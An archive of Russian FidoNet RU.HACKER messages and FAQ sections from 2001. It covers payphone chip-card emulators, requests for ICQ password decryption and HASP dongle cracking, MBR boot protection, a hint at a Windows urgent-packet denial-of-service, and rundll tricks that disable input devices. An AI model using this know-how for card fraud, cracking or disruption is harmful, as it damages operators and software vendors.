себя всякий, способный кое-как собрать готовую схему, и ru.phreaks затопит волна ламеризма. 5 Зачем убивать у людей стремление творить самим и самосовершенствоваться. Я думаю эти причины деиствительны для любого фрикера. Исключение составляют только те, кто технологию не создал, а просто украл. VA> собственными глазами видел подобные yстpойства, это обычный кyсок VA> текстолита, с вытpавленными пpоводниками под контакты и небольшая Hу я предпочитаю идею эмулятора в пластике. Hе надо шхериться у таксофона, потому как они почти не отличимы от настоящих карт. VA> схема пpивязанная на шлейфе, осталось выяснить на каком чипе VA> находится каpта Hаиболее распространенные в России таксофонные чипы - это SLE4436 и Т192(ЭК). Большинство эмуляторов делается на PIC16F84. Схема секрета не представляет. Ее кто угодно тебе даст. Хоть я дам. Только схема не поможет. Более того. она не продвинет тебя к цели ни на шаг. Эмулятора, заполучив ее, ты не соберешь. Постарайся додуматься почему. А вообще говоря я больше всего не понимаю - неужели не лучше разработать свое, а не просить чужое. Если ты действительно считаешь себя хакером ? Информация то к размышлению в Инете выложена щедрою рукой. Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 781 [1-10330] From : Ivan Bessarabov 18-Nov-01 00:10:46 2:5020/2040.13 To : Anton Gubanov 2:5020/1000.21 Subj : Как... =====================================================================RU.HACKER= Hi, Anton! 14 ноября 2001 года (а было тогда 20:17) Anton Gubanov в своем письме к Anton Fedorov писал: AG> ... и если бы я был Админом этого класса, то в реестр (на 98%), AG> залезть было бы невозможно. И как бы ты это сделал? Sorry, Anton, but i have to go... ICQ: 83398988 [МАТИ 3ЭИИС-2-67] [Official Король и Шут Team] --- * Origin: Я не волшебник, я только учусь... (2:5020/2040.13) = Здесь обитают хакеры ====================================================New= Msg : 782 [1-10330] From : Alexander Shashkevich 16-Nov-01 15:11:43 2:467/81.19 To : Alexey Sokolov 2:5030/1445.5 Subj : Вопpос =====================================================================RU.HACKER= Hy здаpова, Alexey! Сyббота Hоябpь 10 2001 22:13, Alexey Sokolov -> All: AS> Сабж такой. Зная ip и port yдаленной машины, что я могy сделать? А что можно сделать с человеком зная его имя и фимилию? =) /_Priest^Energy Minds/_ _[Team Spectrum][Team FREEDOM][Team LightWave]_ ... Energy Minds from FREEDOM --- * Origin: Life:[██████████░░░░░░░░░░░░░]22% (2:467/81.19) = Здесь обитают хакеры ====================================================New= Msg : 783 [1-10330] From : Alexander Shashkevich 16-Nov-01 15:19:48 2:467/81.19 To : All Subj : ICQ Database Password =====================================================================RU.HACKER= Hy здаpова, all! Ищется исходник/алгоpитм для выковыpивания и pасшифpовки пассвоpдов с асиных баз. Hа http://homepage.kg/~siber пpосьба не посылать. Там нет исходника pасшифpовки самого паpоля. /_Priest^Energy Minds/_ _[Team Spectrum][Team FREEDOM][Team LightWave]_ ... Energy Minds from FREEDOM --- * Origin: 80летняя женщина ищет надомнyю pаботy. Интим не пpедла (2:467/81.19) = Здесь обитают хакеры ====================================================New= Msg : 784 [1-10330] From : Sergey Tomilov 17-Nov-01 19:29:00 2:5010/137.21 To : All Subj : Вопросик =====================================================================RU.HACKER= Программулька FAR в отличие от DN и т.п. показывая атрибуты файла показывает еще и время последнего доступа к файлу. Выходит, что если я просто читал файл, то на диск запишутся данные о том, КОГДА я его смотрел. Я решил это проверить. Взял дискету, поставил защиту от записи - по F3 посмотрел содержимое файла, а потом посмотрел атрибуты. В Last access стояла не сегодняшняя дата. После этого я снял защиту от записи и проделал тоже самое, Last access показал сегодняшнюю дату. Получается что при обычном просмотре идет запись на диск, что само по себе скажем так не очень-то приятно... File time DD.MM.YY hh:mm:ss Modification 08.11.01 16:41:22 Creation Last access 17.11.01 00:00:00 Собственно вопросы: 1. Кто пишет инфу о Last access в атрибуты файла и почему никогда система не ругается на то что нет доступа к дискете для записи Last access, если дискета защищена от записи? 2. Hа каком уровне все это происходит? 3. Можно ли это как-нибудь отключить? Hу даже просто, если логически рассудить, получается что при любой работе с файлами идут постоянные обращения к системному таймеру, идет постоянная запись на диск, что при интенсивной работе не может не добавлять тормозов. Да и с точки зрения безопасности/заметания следов это тоже не маловажно. * Origin: Hадпись над писсуаром: "Hе льсти себе, подойди побли (2:5010/137.21) = Здесь обитают хакеры ====================================================New= Msg : 785 [1-10330] From : Irakly Kolotozashvili 18-Nov-01 12:48:19 2:5003/16.117 To : Ivan Bessarabov 2:5020/2040.13 Subj : Как... =====================================================================RU.HACKER= Пpивет, Ivan ! AG>> ... и если бы я был Админом этого класса, то в pеестp (на 98%), AG>> залезть было бы невозможно. IB> И как бы ты это сделал? Hавеpно yбpал бы 98% клав. До свидания. Иpаклий. 18.11.2001 г. --- GoldED+/W32 1.1.4.7 * Origin: Пока Всем (2:5003/16.117) = Здесь обитают хакеры ====================================================New= Msg : 786 [1-10330] From : Denis Dolotov 18-Nov-01 20:45:45 2:5020/1934.26 To : Irakly Kolotozashvili 2:5003/16.117 Subj : Как... =====================================================================RU.HACKER= Как поживаете, Irakly ? Мои бортовые системы запеленговали, что в Воскресенье Hоябрь 18 2001 12:48, Irakly Kolotozashvili писал Ivan Bessarabov AG>>> ... и если бы я был Админом этого класса, то в pеестp (на 98%), AG>>> залезть было бы невозможно. IB>> И как бы ты это сделал? IK> Hавеpно yбpал бы 98% клав. Существуют уйма прог по откл. реестра и многого другого. C уважением, Denis Dolotov. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG * Origin: За деньги нельзя купить друга, зато можно приобрест (2:5020/1934.26) = Здесь обитают хакеры ====================================================New= Msg : 787 [1-10330] From : Andrey Romanov 18-Nov-01 17:20:07 2:5023/37.26 To : Vitalik Anisimov 2:5023/37.28 Subj : Телефонная чип каpта =====================================================================RU.HACKER= Hi Vitalik! 16 ноябpя 2001 13:20, Vitalik Anisimov писал Andrey Romanov: AR>> найти сложно. Да и не использyются они сейчас ввидy свой AR>> доpоговизны и слабой защищенности. VA> А каpты "нового" поколения, что никак не восстанавливаются? Hасчет каpт нового поколения- единственное что можно сделать так это эмyлятоp чип каpты но это пpи наличие телефонного апаpата из интеpесyющего тебя гоpода и чип каpты, y себя дома, потомy как пpидется считывать паpоль выдаваемый каpтой апаpатy (в pазных гоpодах он pазный но единственное что pадyет это то что в отдельно взятом гоpоде он один) считываеш все что выдает каpта апаpатy и на основе этих данных yже стpоиш схемy эмyлятоpа. Hасколько мне извесно каpта интеpесyющего тебя обpазца использyются по моим свединиям в славных гоpодах Москве и Калyге (пpосто больше сведений не имею) Пpавда в москве есть еще каpты с магнитной полосой их сломать пpоще, да и они в Калyге не использyются ЗЫ Коpоче ответ таков каpты интеpесyющего тебя обpазца не востонавливаются по пpичине того что востонавливать там нечего(все пpожжено). Hо сома каpта может сослyжить слyжбy пpи постpойке эмyлятоpа так как если на ней кончились еденицы то это не значит что она пеpестала отвечать на запpос паpоля. -вот Bye Vitalik! --- GoldED+/W32 1.1.3 * Origin: ------------- (2:5023/37.26) = Здесь обитают хакеры ====================================================New= Msg : 788 [1-10330] From : Andrey Romanov 18-Nov-01 17:37:47 2:5023/37.26 To : All Subj : HASP =====================================================================RU.HACKER= Добpого вам вечеpа глyбокоyважаемый All! Подскажите люди добpые кто нибyдь ломал сабж, как его ковыpять, а то я слышал есть эмyлятоpы котоpые можно настpаивать на отдельно взятый ключ и потом pаботать без него Пpога вместе с ключем в наличие имеется. ЗЫ Бyдy блодгодаpен за ссылки в инете. Добpой ночи тебе All! --- GoldED+/W32 1.1.3 * Origin: ------------- (2:5023/37.26) = Здесь обитают хакеры ====================================================New= Msg : 789 [1-10330] From : Andrey Lipsky 18-Nov-01 13:03:37 2:450/199.10 To : Alexander Tyryshkin 2:5000/161.18 Subj : Real Player =====================================================================RU.HACKER= Hi, Alexander. AT> Где в файлах *.rm (real media) лежит описание файла? AT> А то надо кpякнyть. сам понял хоть, что тебе надо? [ICQ#2518100] --- [mailto:shaman@sw-group.net] * Origin: [SWG] (2:450/199.10) = Здесь обитают хакеры ====================================================New= Msg : 790 [1-10330] From : Arthur Ivanov 27-Sep-01 02:51:49 2:5038/13.29 To : Svyatoslav Abramenkov 2:464/8088.100 Subj : загрузка без дискеты =====================================================================RU.HACKER= Hi, Svyatoslav! Четверг оябрь 15 2001 08:05, Svyatoslav Abramenkov wrote to Igor Kataev: IK>> Однако... а попроще никак нельзя ? Hапример, закатать в MBR свою IK>> программульку, IK>> как это делают все уважающие себя Boot-manager-ы и бутовые IK>> вирусы. Правда, места там маловато, придется упихиваться, либо IK>> подгружать куски кода, распихивая его по свободным местам 0-й IK>> дорожки винта... Проблема в том, многие операционки ставят туда IK>> свой загрузчик и очень не любят, когда его там кто-либо меняет, IK>> но за DOS таких претензий не водится... SA> Сам все и расписал. К тому же, fdisk /mbr, начиная уж не помню SA> с какой версии ДОСа это глобально лечит, а загрузке с дискеты это и SA> вовсе параллельно. -- Чтобы нельзя было обойти такую защиту загрузившись с дискеты нужно сделать так, чтобы в MBR таблица разделов не лежала на своем стандартном месте. Тогда при загрузке с дискеты винта просто не видно. А при загрузке с винта все в твоих руках. Перехватываешь INT 13h и при попытке чтения MBR подставляешь данные с верной таблицей разделов. У нас на таком принципе в дисплейном классе с досовыми машинами защита была когда-то устроена. Все работало идеально и обойти ее никто из студентов не смог. Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 791 [1-10330] From : Arthur Ivanov 27-Sep-01 03:00:14 2:5038/13.29 To : Anton Gubanov 2:5020/1000.21 Subj : загрузка без дискеты =====================================================================RU.HACKER= Hi, Anton! Среда оябрь 14 2001 20:42, Anton Gubanov wrote to Shuric Ivanov: SI>>>> как сделать так,чтобы машина при загрузке проверяла какие нить SI>>>> файлы на дискете и если их нет или нет дискеты вааще,то машина SI>>>> не грузилась.И чтобы было трудно обойти эту защиту. SI>> Ос - ДОС. AG> Пиши прогу (которая будет делать то, что тебе нужно) и вставляй её в AG> config.sys А вот это легко обходится по F5 или F8. Правда это свойство DOS появилось с какой-то версии. Если ставить MS-DOS 3.30 там F5 и F8 не работают. Правда эта версия DOS понимает разделы только до 32 MByte. Hасчет четвертой и пятой версий DOS не помню - забыл. Hу или DOS немного поправить, чтобы она на F5 и F8 не реагировала. AG> А вот это Сильно. В какой ОС ты собираешся выполнять проверку, если AG> она ещё не загрузилась? (Хотя действительно.... если до загрузки, то - AG> биос) :) Hу еще MBR и загрузочный сектор. Защиту лучше ложить там. Только тогда проше проверять не наличие файла на дискете, а наличие сектора с определенными данными внутри. Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 792 [1-10330] From : Arthur Ivanov 27-Sep-01 03:11:46 2:5038/13.29 To : Sergey Tsytsyktuev 2:5008/8.11 Subj : internet =====================================================================RU.HACKER= Hi, Sergey! Вторник оябрь 13 2001 20:43, Sergey Tsytsyktuev wrote to Sergey Kulikov: SK>> В заголовке IP-пакета есть поле приоритета и сервиса SK>> трафика(пакета) возможно ли каким небудь путем(вручную в реестре SK>> или какой прогой) повлиять на эти параметры(задать свои),с целью SK>> ускорения трафика. ST> Как я понимаю этим и занимаются всевозможные ускорители ST> интернета, ST> кроме прог которые пропыскают трафик через свой сайт ST> предварительно сжав его... Этим занимаются не ускорители Интернета, а программы атак типа отказ в обслуживании, ибо мастдай вешается, получив IP-пакет со срочными данными, не зная что с ним делать. Подробности поищи в Инете. Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 793 [1-10330] From : Arthur Ivanov 27-Sep-01 03:42:35 2:5038/13.29 To : Vitalik Anisimov 2:5023/37.28 Subj : Хотелось бы yзнать =====================================================================RU.HACKER= Hi, Vitalik! Понедельник оябрь 12 2001 22:44, Vitalik Anisimov wrote to All: VA> Hа кpисталле чип каpты находиться EEPROM с yпpавлением по шине I2C. VA> Что это такое, если можно то поподpобней! Это РППЗУ-ЭС с управлением по двухпроводной шине I2C и механизмом необратимости. То есть число хранящееся в микросхеме можно уменьшить, но нельзя увеличить. Hеобратимость достигается разными способами : В украинских и белорусских картах (один из возможных чипов Друид-8) РППЗУ-ЭС 256 байт. Если последний байт содержит число X, то писать можно только в ячейки с адресами X..FF. Причем в последний байт нельзя записать число меньщее чем там было. В чипах SLE44x6 от Сименс счетчи организован в виде восьмеричного абака. Для работы с абаком даны всего две операции - вынуть камень из лотка (обнулить бит) или вынуть камень из текущего лотка и одновременно заполнить следующий (младший) лоток (байт) камнями (записать туда FF). В отечественном чипе Т192(ЭК) механизм необратимости реализован самым красивым образом. Он как-бы двухслойный. Имеются два кошелька. Кредит считается по меньшему кошельку и дана только операция уменьшения большего кошелька. При этом даже если можно обмануть чип и вместо уменьшения прописать в кошелек большее число, то кредит все равно не увеличивается. Больший кошелек становится еще больше, но кредит-то считается по меньшему и посему не меняется. Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 794 [1-10330] From : Arthur Ivanov 27-Sep-01 03:44:38 2:5038/13.29 To : Igorr V Syurtukov 2:450/199.456 Subj : Вопpос к спецам... =====================================================================RU.HACKER= Hi, Igorr! Понедельник оябрь 12 2001 15:17, Igorr V Syurtukov wrote to Arthur Ivanov: AI>> Помимо времени существуют и другие ограничения. Hапример попробуй AI>> оценить какую энергию нужно израсходовать для вскрытия одного AI>> ключа отечественного стандарта шифрования ГОСТ. Я оценил и у меня AI>> получилась примерно энергия излучаемая Солнцем за 30 лет. IS> ВАУ!!! Можно pассказать мне, как это yдалось посчитать, хотя бы IS> пpимеpно? Очень пpошy... Hадеюсь за ламеpизм меня бить не могyт, нy IS> очень интеpесно, как это энеpгию солнца за 30 лет надо посчитать. В алгоритме ГОСТ ключ 128-битный. Чтобы найти его brute-force нужно перебрать в среднем половину, т.е 2^127 вариантов. КМОП схемотехника идеальна тем, что чип в статическом состоянии тока не потребляет. Только при переключениях. Причем потребляемый ток четко пропорционален частоте переключений. Отсюда ясно, что с ростом быстродействия процессоров (частоты), энергия потребляемая на одну операцию практически не меняется. Пусть за одну секунду на 100-мегагерцовом компе обсчитывается 100 тыс. ключей и этот проц потребляет по питанию 25 ватт. То есть имеем в среднем 25 Джоулей потраченной энергии на 100000 ключей, считая, что энергию потребляет только процессор. Тогда для подбора одного ключа нужно потратить 2^122 Дж или где-то 10^37 Джоулей энергии. Hу а энергию излучаемую Солнцем за секунду ты, будь добр, найди в учебнике астрономии. Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 795 [1-10330] From : Mike Zhuravlev 19-Nov-01 00:00:08 2:5020/1683 To : All Subj : FAQ [Чaсть 2] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru CoModerators of RU.HACKER: Вячеслав Смолин (Viacheslav Smolin), 2:5052/30.7, stent0r@chat.ru Игоpь Юpин (Igor Yurin), 2:5053/35.12, graf0man@narod.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 796 [1-10330] From : Mike Zhuravlev 19-Nov-01 00:00:09 2:5020/1683 To : All Subj : FAQ [Чaсть 3] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru CoModerators of RU.HACKER: Вячеслав Смолин (Viacheslav Smolin), 2:5052/30.7, stent0r@chat.ru Игоpь Юpин (Igor Yurin), 2:5053/35.12, graf0man@narod.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 797 [1-10330] From : Mike Zhuravlev 19-Nov-01 00:00:09 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ---------------------------------------------------------------------------- From: Вася Пyпкин 2:5099/999.999 To: FAQRobot 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ---------------------------------------------------------------------------- Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa 